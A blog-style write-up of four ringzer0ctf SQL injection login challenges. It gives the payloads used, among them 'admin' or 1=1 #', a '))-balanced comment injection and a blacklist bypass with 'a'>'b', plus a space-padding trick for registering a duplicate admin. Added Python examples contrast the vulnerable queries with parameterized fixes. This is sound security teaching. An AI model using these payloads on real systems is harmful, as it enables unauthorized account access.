CTF ringzer0ctf — SQLi challenges — part 1

Last updated 2 years ago

All right! Here we'll dive into the vulnerability that interests me most: SQL injection ❤

Let's solve some CTF challenges on this topic from the ringzer0ctf website.

Challenge 1 — Most basic SQLi pattern

From its name it seems to be the easiest SQLi challenge to solve: you will find a login form, and the first thing to try is injecting this payload

admin' or 1=1 #

Good, it worked! You have the flag, and congrats on the first point ❤

Challenge 2 — Random Login Form

Here the situation is a little different because you have two forms: the first is a login form and the second is a registration form. If you try to register an account with the username admin you will get a message that this account already exists, so try to log into it with our simple trick

username: admin & password: aykalam' or 1=1#

but unfortunately you will get an error message; this trick fails to log you in, and I tried more than one trick but none of them worked

Now we don't have any way of creating an account with the username admin.

After trying more and more and searching, I found something tricky: try to register an account with these credentials

username: — — admin — — &password=anything_you_want

Note: each — character is a space.

By adding, for example, 4 spaces before and after the username, the input passes the validation, and the spaces are then stripped by the application or the database, so you bypass the check and register with the username admin; the password can be any word you want

Now try to log in again

FLaaaaaaaaG :) Congratulations on the points ❤
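The space-padding trick above, reproduced on a SQLite database so the defect and its fix can be seen side by side. This is an added example, not the challenge's code: the registration logic, the TRIM on insert and the sample table are assumptions about how such a backend could behave.

```python
# Added example (not the challenge's code): a registration routine whose duplicate
# check sees the raw username while the stored value is trimmed, and the fixed form.
import sqlite3

def make_db():
    db = sqlite3.connect(":memory:")
    # Constructed schema: no UNIQUE constraint, so uniqueness rests on app logic alone.
    db.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    db.execute("INSERT INTO users VALUES ('admin', 'original-password')")
    return db

def register_buggy(db, username, password):
    # Bug: the existence check compares the raw input ('    admin    '), but the
    # row is stored with TRIM(), so a second 'admin' lands in the table.
    exists = db.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone()
    if exists:
        return "exists"
    db.execute("INSERT INTO users VALUES (TRIM(?), ?)", (username, password))
    return "created"

def register_fixed(db, username, password):
    # Fix: canonicalize once and use that value for both the check and the insert.
    # A UNIQUE index on username would catch any remaining gap at the database.
    canonical = username.strip()
    if not canonical:
        return "invalid"
    exists = db.execute("SELECT 1 FROM users WHERE username = ?", (canonical,)).fetchone()
    if exists:
        return "exists"
    db.execute("INSERT INTO users VALUES (?, ?)", (canonical, password))
    return "created"

def count_admins(db):
    return db.execute("SELECT COUNT(*) FROM users WHERE username = 'admin'").fetchone()[0]

def demo(register):
    """Register the padded username with one routine; return (outcome, admin rows)."""
    db = make_db()
    outcome = register(db, "    admin    ", "anything_you_want")
    return outcome, count_admins(db)

if __name__ == "__main__":
    print("buggy:", demo(register_buggy))   # ('created', 2): a second admin row
    print("fixed:", demo(register_fixed))   # ('exists', 1): rejected as duplicate
```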

Challenge 3 — Po po po po postgresql

If you open this challenge you'll get a login page, and by default you'll use the simple technique of injecting ' (a single quote) in the username field to notice how the backend balances the query; for example, the backend may balance the query by inserting ', ", '), "), or nothing at all, and so on.

By inserting ' you get something nice: an error message that demonstrates the query-balancing method. Nice :)

From the screenshot and the error, the backend balances the query by ending it with the characters '), so we'll try to inject that with our payload, but wait and look at the error again

You'll have to insert 2 ) because there's another one at the start which needs to be closed, so the balancing here is ')) not ')

username: admin')) --

Good! We got it!

Challenge 4 — Login portal 1

After going into the challenge you will see another … what!! a login page again!!

So let's deal with it using the default payload ' and no error message appears!

Try to inject this payload → admin' or 1=1 # and you will see the message Illegal characters detected.

Nice, so the system validates the input and has a blacklist of some characters like # and =

so we will try to find alternatives for these characters

you can use > or < instead of = in this way

username: admin' or 'a'>'b

trying this method…

We have 2 points NOW, good!
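The injections from challenges 1, 3 and 4, replayed against a deliberately string-built query and a parameterized one. This is an added example and not the challenge backend's code; the query shapes, the in-memory SQLite database and its single admin row are assumptions, and the MySQL-only # comment is written as -- so the payloads parse in SQLite and PostgreSQL.

```python
# Added example (not the challenge's backend): the writeup's payloads against a
# string-built query and a parameterized one, on an in-memory SQLite database.
import sqlite3

def make_db():
    # Constructed sample data: one admin user with a password the attacker does not know.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-not-guessable')")
    return db

def vulnerable_login(db, username, password, shape="plain"):
    # Attacker text is pasted into the SQL. "paren" assumes a backend that wraps
    # each term in parentheses, which is why the ')) balancing was needed.
    if shape == "paren":
        sql = "SELECT username FROM users WHERE ((username = '%s') AND (password = '%s'))"
    else:
        sql = "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
    row = db.execute(sql % (username, password)).fetchone()
    return row[0] if row else None

def safe_login(db, username, password):
    # Bound parameters: values travel separately from the SQL text, so quotes,
    # comment markers and comparison operators are never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# Payloads from the writeup; '#' is a MySQL-only comment, '--' is the SQLite/PostgreSQL form.
PAYLOADS = {
    "challenge1": ("admin' or 1=1 --", "plain"),
    "challenge3": ("admin')) --", "paren"),
    # No '=' and no '#'. 'a'>'b' is false, but AND binds tighter than OR, so the
    # query reads username='admin' OR (false AND password=...) and still matches.
    "challenge4": ("admin' or 'a'>'b", "plain"),
}

def run_all():
    """Return {name: (vulnerable result, parameterized result)} using a wrong password."""
    db = make_db()
    return {name: (vulnerable_login(db, payload, "wrong", shape),
                   safe_login(db, payload, "wrong"))
            for name, (payload, shape) in PAYLOADS.items()}

if __name__ == "__main__":
    for name, (vuln, safe) in run_all().items():
        print(f"{name}: vulnerable -> {vuln!r}, parameterized -> {safe!r}")
```

Every vulnerable variant returns the admin row with a wrong password, while the parameterized query returns nothing, which is why a character blacklist like the one in challenge 4 is not a substitute for bound parameters.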

Challenges covered in this part:

Challenge 1 — Most basic SQLi pattern

Challenge 2 — Random Login Form

Challenge 3 — Po po po po postgresql

Challenge 4 — Login portal 1

Fu*$^& login form again

From this list (WAF-GitHub) you will find more than one technique to bypass filtered characters.